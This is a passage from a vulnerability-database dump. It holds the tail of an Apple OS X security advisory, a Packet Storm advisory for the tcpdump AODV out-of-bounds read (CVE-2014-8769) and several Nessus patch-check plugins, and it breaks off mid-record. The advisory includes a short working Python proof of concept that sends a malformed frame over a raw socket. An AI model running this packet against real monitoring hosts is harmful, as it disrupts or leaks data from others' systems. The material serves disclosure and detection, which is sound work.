of Audio Poison\r\nCVE-2015-3788 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3789 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3790 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3791 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-3792 : Ryan Pentney and Richard Johnson of Cisco Talos\r\nCVE-2015-5751 : WalkerFuz\r\n\r\nSceneKit\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Viewing a maliciously crafted Collada file may lead to\r\narbitrary code execution\r\nDescription: A heap buffer overflow existed in SceneKit's handling\r\nof Collada files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5772 : Apple\r\n\r\nSceneKit\r\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\r\nOS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in SceneKit. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3783 : Haris Andrianakis of Google Security Team\r\n\r\nSecurity\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A standard user may be able to gain access to admin\r\nprivileges without proper authentication\r\nDescription: An issue existed in handling of user authentication.\r\nThis issue was addressed through improved authentication checks.\r\nCVE-ID\r\nCVE-2015-3775 : [Eldon Ahrold]\r\n\r\nSMBClient\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the SMB client.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3773 : Ilja van Sprundel\r\n\r\nSpeech UI\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted unicode string with speech\r\nalerts enabled may lead to an unexpected application termination or\r\narbitrary code execution\r\nDescription: A memory corruption issue existed in handling of\r\nUnicode strings. This issue was addressed by improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-3794 : Adam Greenbaum of Refinitive\r\n\r\nsudo\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in sudo versions prior to\r\n1.7.10p9, the most serious of which may allow an attacker access to\r\narbitrary files\r\nDescription: Multiple vulnerabilities existed in sudo versions prior\r\nto 1.7.10p9. These were addressed by updating sudo to version\r\n1.7.10p9.\r\nCVE-ID\r\nCVE-2013-1775\r\nCVE-2013-1776\r\nCVE-2013-2776\r\nCVE-2013-2777\r\nCVE-2014-0106\r\nCVE-2014-9680\r\n\r\ntcpdump\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Multiple vulnerabilities existed in tcpdump 4.7.3, the most\r\nserious of which may allow a remote attacker to cause a denial of\r\nservice.\r\nDescription: Multiple vulnerabilities existed in tcpdump versions\r\nprior to 4.7.3. These were addressed by updating tcpdump to version\r\n4.7.3.\r\nCVE-ID\r\nCVE-2014-8767\r\nCVE-2014-8769\r\nCVE-2014-9140\r\n\r\nText Formats\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Parsing a maliciously crafted text file may lead to\r\ndisclosure of user information\r\nDescription: An XML external entity reference issue existed with\r\nTextEdit parsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3762 : Xiaoyong Wu of the Evernote Security Team\r\n\r\nudf\r\nAvailable for: OS X Yosemite v10.10 to v10.10.4\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3767 : beist of grayhash\r\n\r\nOS X Yosemite v10.10.5 includes the security content of Safari 8.0.8:\r\nhttps://support.apple.com/en-us/HT205033\r\n\r\nOS X Yosemite 10.10.5 and Security Update 2015-006 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n\r\n\r\n", "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:DOC:32390", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32390", "title": "APPLE-SA-2015-08-13-2 OS X Yosemite v10.10.5 and Security Update 2015-006", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:31", "bulletinFamily": "exploit", "description": "", "modified": "2014-11-19T00:00:00", "published": "2014-11-19T00:00:00", "href": "https://packetstormsecurity.com/files/129157/tcpdump-4.6.2-AOVD-Unreliable-Output.html", "id": "PACKETSTORM:129157", "type": "packetstorm", "title": "tcpdump 4.6.2 AOVD Unreliable Output", "sourceData": "`CVE-2014-8769 tcpdump unreliable output using malformed AOVD payload \n \n1. Background \n \ntcpdump is a powerful command-line packet analyzer. It allows the user \nto intercept and display TCP/IP and other packets being transmitted or \nreceived over a network to which the computer is attached. \n \n2. Summary Information \n \nIt was found out that malformed network traffic (AOVD-based) can lead to \nan abnormal behaviour if verbose output of tcpdump monitoring the \nnetwork is used. \n \n3. Technical Description \n \nThe application decoder for the Ad hoc On-Demand Distance Vector (AODV) \nprotocol fails to perform input validation and performs unsafe \nout-of-bound accesses. The application will usually not crash, but \nperform out-of-bounds accesses and output/leak larger amounts of invalid \ndata, which might lead to dropped packets. It is unknown if other \npayload exists that might trigger segfaults. \n \nTo reproduce start tcpdump on a network interface \n \nsudo tcpdump -i lo -s 0 -n -v \n \n(running the program with sudo might hide a possible segfault message on \ncertain environments, see dmesg for details) \n \nand use the following python program to generate a frame on the network \n(might also need sudo): \n \n#!/usr/bin/env python \nfrom socket import socket, AF_PACKET, SOCK_RAW \ns = socket(AF_PACKET, SOCK_RAW) \ns.bind((\"lo\", 0)) \n \naovd_frame = \n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x7a\\xdf\\x6f\\x08\\x00\\x45\\x00\\xe6\\x3d\\xf3\\x7f\\x40\\x00\\x40\\x11\\x30\\xc6\\x0a\\x01\\x01\\x68\\x0a\\x02\\x02\\x02\\x02\\x8e\\x0d\\x00\\x4b\\x00\\x00\\xe8\\x12\\x00\\x00\\x00\\x00\\x1f\\xc6\\x51\\x35\\x97\\x00\\x24\\x8c\\x7a\\xdf\\x6f\\x08\\x00\\x45\\x00\\xe6\\x3d\\xf3\\x7f\\x40\\x00\\x40\\x11\\x30\\xc6\\x0a\\x01\\x01\" \n \ns.send(aovd_frame) \n \n4. Affected versions \n \nAffected versions are 3.8 through 4.6.2 \n \n5. Fix \n \nThe problem is fixed in the upcoming version tcpdump 4.7.0 \n \n6. Advisory Timeline \n \n2014-11-08 Discovered \n2014-11-09 Requested CVE \n2014-11-11 Reported vendor by email \n2014-11-12 Vendor made a fix available as repository patch \n2014-11-13 CVE number received \n2014-11-13 Published CVE advisory \n \n7. Credit \n \nThe issue was found by \n \nSteffen Bauch \nTwitter: @steffenbauch \nhttp://steffenbauch.de \n \nusing a slightly enhanced version of american fuzzy lop \n(https://code.google.com/p/american-fuzzy-lop/) created by Michal Zalewski. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/129157/tcpdump-output.txt", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV68951.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81922", "published": "2015-03-19T00:00:00", "title": "AIX 7.1 TL 2 : tcpdump (IV68951)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81922);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 7.1 TL 2 : tcpdump (IV68951)\");\n script_summary(english:\"Check for APAR IV68951\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"05\", patch:\"IV68951s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.2.0\", maxfilesetver:\"7.1.2.18\") < 0) flag++;\nif (aix_check_ifix(release:\"7.1\", ml:\"02\", sp:\"06\", patch:\"IV68951s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.2.0\", maxfilesetver:\"7.1.2.18\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV68992.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81923", "published": "2015-03-19T00:00:00", "title": "AIX 6.1 TL 9 : tcpdump (IV68992)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81923);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 6.1 TL 9 : tcpdump (IV68992)\");\n script_summary(english:\"Check for APAR IV68992\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"09\", sp:\"04\", patch:\"IV68992s4a\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.9.0\", maxfilesetver:\"6.1.9.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV68950.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81921", "published": "2015-03-19T00:00:00", "title": "AIX 6.1 TL 8 : tcpdump (IV68950)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81921);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 6.1 TL 8 : tcpdump (IV68950)\");\n script_summary(english:\"Check for APAR IV68950\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:6.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"05\", patch:\"IV68950s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.18\") < 0) flag++;\nif (aix_check_ifix(release:\"6.1\", ml:\"08\", sp:\"06\", patch:\"IV68950s5a\", package:\"bos.net.tcp.server\", minfilesetver:\"6.1.8.0\", maxfilesetver:\"6.1.8.18\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:41", "bulletinFamily": "scanner", "description": "CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by the improper handling of input by the application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol. By sending specially-crafted data, a remote attacker could exploit this vulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769", "modified": "2015-03-19T00:00:00", "id": "AIX_IV67588.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=81920", "published": "2015-03-19T00:00:00", "title": "AIX 7.1 TL 3 : tcpdump (IV67588)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory tcpdump_advisory.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81920);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:24:54 $\");\n\n script_cve_id(\"CVE-2014-8769\");\n\n script_name(english:\"AIX 7.1 TL 3 : tcpdump (IV67588)\");\n script_summary(english:\"Check for APAR IV67588\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2014-8769 tcpdump is vulnerable to a denial of service, caused by\nthe improper handling of input by the application decoder for the Ad\nhoc On-Demand Distance Vector (AODV) protocol. By sending\nspecially-crafted data, a remote attacker could exploit this\nvulnerability to cause the application to crash.\n\nPlease see following for more information :\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8769\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/tcpdump_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.1\", ml:\"03\", sp:\"04\", patch:\"IV67588s4a\", package:\"bos.net.tcp.server\", minfilesetver:\"7.1.3.0\", maxfilesetver:\"7.1.3.30\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:23:08", "bulletinFamily": "scanner", "description": "tcpdump has been updated to fix two security issues :\n\n - Unreliable output using malformed AOVD payload.\n (CVE-2014-8769). (bnc#905872)\n\n - Denial of service in verbose mode using malformed OLSR payload. (CVE-2014-8767). (bnc#905870)", "modified": "2014-12-26T00:00:00", "id": "SUSE_11_TCPDUMP-141215.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=80253", "published": "2014-12-26T00:00:00", "title": "SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10093)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80253);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2014/12/26 14:03:25 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\");\n\n script_name(english:\"SuSE 11.3 Security Update : tcpdump (SAT Patch Number 10093)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"tcpdump has been updated to fix two security issues :\n\n - Unreliable output using malformed AOVD payload.\n (CVE-2014-8769). (bnc#905872)\n\n - Denial of service in verbose mode using malformed OLSR\n payload. (CVE-2014-8767). (bnc#905870)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=905870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=905872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8767.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-8769.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10093.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:tcpdump\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"tcpdump-3.9.8-1.23.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"tcpdump-3.9.8-1.23.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"tcpdump-3.9.8-1.23.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-21T01:22:57", "bulletinFamily": "scanner", "description": "Security fix for CVE-2014-8767 CVE-2014-8769\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2015-10-19T00:00:00", "id": "FEDORA_2014-15549.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=79700", "published": "2014-12-04T00:00:00", "title": "Fedora 19 : tcpdump-4.4.0-4.fc19 (2014-15549)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-15549.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79700);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:14:43 $\");\n\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\");\n 